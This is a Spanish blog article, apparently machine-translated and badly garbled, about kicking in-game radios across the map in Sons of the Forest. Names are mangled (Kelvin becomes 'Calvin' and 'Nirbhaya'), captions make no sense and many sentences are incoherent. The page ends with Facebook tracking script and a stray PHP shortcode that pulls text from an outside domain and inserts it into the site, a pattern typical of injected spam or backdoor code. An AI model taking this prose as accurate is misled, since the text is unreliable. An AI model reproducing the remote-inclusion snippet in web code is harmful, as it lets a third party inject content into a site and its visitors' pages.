Cuando puse mis ojos (y oídos) por primera vez en uno de ellos. hijos del bosquelas radios, no tenía idea de que, unas horas más tarde, las estaría pateando por el bosque. Y ciertamente no anticipé la extraña gravedad y el camino que desafía la física que estos dispositivos me llevarían.


Estaba decidido a traer sus canciones a mi base; después de todo, la artesanía es mucho más cuando tiene su propia banda sonora. Lo que no consideré fue que, si bien puedes encender la radio y recolectarlos para la placa de circuito, Sons of the Forest se niega rotundamente a dejarte tomar uno. .



Aquí está, la radio que lo empezó todo.


En cambio, cae en la categoría de decoraciones no coleccionables, como cubos y bolsas de basura. En el último parche, puedo confirmar, “Se corrigió que Kelvin dejara caer radios y destruyera la radio”. En cambio, este NPC generalmente amigable los acogerá por un corto período de tiempo. Luego la arrojaría a otra dimensión, de la que nunca más se volvería a saber de ella.


Anteriormente había intentado patear una radio, solo por diversión, y sin darme cuenta descubrí que era resistente al agua en el proceso (no preguntes). Pero luego pensé: ¿y si sigo adelante? Decidí abusar del motor de física y patear la radio hasta que volví a mi base. Pero, como residente permanente de la Zona Fantasma con la radio anterior, necesitaba encontrar un nuevo boombox. Por suerte, llegué a la veta madre: tropecé con un campamento de caníbales con tres radios, todos listos para repartir castigos por el mapa.



¡Bote! ¡Una verdadera tienda AV en medio de la jungla!


El mismo Nirbhaya no estaba a la vista. Esta carrera en particular la estaba jugando en modo pacífico, así que no tenía que preocuparme por comerme la cara. Y, durante un tiempo, las cosas iban bien, aunque lentamente.


Traje a Calvin para el viaje y le asigné la tarea de cortar los árboles. Sí, las radios de Sons of the Forest son extrañamente resistentes al agua, pero estaba decidido a hacer las cosas bien. Así que me tomé la molestia de construir una rampa y/o un puente sobre el río que encontré. Toma eso, Death Stranding, con tus bebidas energéticas y tus tontos Cabalga con Norman Reedus. Cortinas de baño


Y ese era el plan, cuando pateé la primera de las tres radios de regreso a mi base. Las cosas iban bien hasta el momento, a pocos metros de mi primera rampa, la primera radio golpeó el borde de un tronco y explotó. El silencio llenó el bosque (la radio estaba sonando cuando la encendí), dejándome con una placa de circuito de aspecto triste.



Half-Life 2 Genome no tiene nada en él.


El segundo no fue mucho mejor. Me las arreglé para cruzar el río y estaba driblando el estéreo portátil hacia el cuartel general cuando golpeó una roca. Podía escucharlo tocar en algún lugar debajo de mí; si bien esto podría ser útil para futuros arqueólogos, no fue bueno para mí.


Tercera vez con suerte, razoné. No me molesté en encenderlo, cuando también fue tragado por el suelo, y comencé a caminar enojado de regreso a Cannibal Central. Deambulé justo más allá de la radio, todavía eligiendo su música, junto con uno o dos anuncios extraños.



Ahí estás, hermoso idiota.


De repente, me di cuenta: necesitaba a Calvin. Rompí con una sacudida y descubrí mi hacha salvadora de orejas sangrantes en la mano, todavía felizmente saqueando el bosque. Lo llevé hasta la radio enterrada y, contra toda esperanza, le ordené que la recogiera y la arrojara a mis pies.


Felizmente, lo recuperó y seguí adelante, presionando la preciosa caja de resonancia mientras avanzaba. Me alejé brevemente de él y comencé a recolectar más troncos. Pero luego cambié de opinión… sin embargo, no fue por ninguna preocupación ambiental.


En cambio, animado por el poder del rock y totalmente obsesionado con recuperar la radio, decidí que simplemente lo dejaría sin efecto. ¿Creen que pueden quitarme el derecho a apedrearme, Hijos del Bosque? ¡No seré negado!



¿La mejor manera de transportar equipos de audio? ¡bota!


Este fue mi hilo de pensamiento; Eso es hasta que la radio se lanzó a la estratosfera. Miré hacia abajo, hubo un silencio repentino, golpeó el otro lado del río.


En cierto modo, me alegré de que la zona de comida al aire libre para caníbales ahora estuviera libre de radios. El plan B era establecer una nueva base con radios, pero el olor, y las moscas, estaban un poco fuera de lugar. Traté de romper algunas de las ollas más espantosas, pero terminé con un puñado de manchas carnosas y molestas. Era hora de seguir adelante. El baile y la carne podrida no van bien juntos. Y necesitaba un mejor nombre de DJ que MC Murder Camp.


Mi búsqueda continuó durante todo el invierno, ya que en su mayoría dejé de lado las necesidades básicas de alimentos, agua y calor, y el fuego se encendió solo cuando los cristales de hielo comenzaron a oscurecer mi visión. Y robé los Cheerios de este tipo muerto, pero de ninguna manera se los metería en la boca con una pelota de golf.


Pero mis esfuerzos adicionales solo llevaron a la decepción. Llegué bastante lejos con una radio, robada de un campamento lleno de esqueletos. Luego se fue. Entonces no lo fue. Se sentó allí en el río, burlándose de mí, desapareciendo cada vez que me acercaba.



Incluso traté de hacer un pequeño hogar para mi radio, en caso de que alguna vez regresara a mi base.


El siguiente, prestado del otro campo, simplemente desapareció. Parece que los objetos están dañados y/o una vez que se han alejado de su ubicación original. Desde una perspectiva de programación, esto tiene un sentido extraño. La alternativa sería que el desarrollador y Knight rastrearan la posición de todo en el juego, lo que podría ser una pesadilla.


Entonces, ¿dónde deja esto mi búsqueda de la música? Sin una alternativa razonable, y sin capacidad de transmisión de radio y parches nocturnos, he optado por adoptar el Plan B.


Estoy construyendo una nueva base dentro del alcance de la penúltima radio. Hay una cascada adorable, estamos listos para las decoraciones de Halloween y estamos fuera cuando construimos. Puede que no sea el final que buscaba, pero lo tomaré como una victoria.




fbq('init', '1749355691872662');


fbq('track', 'PageView');
window.facebookPixelsDone = true;


window.dispatchEvent(new Event('BrockmanFacebookPixelsEnabled'));


window.addEventListener('BrockmanTargetingCookiesAllowed', appendFacebookPixels);

Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');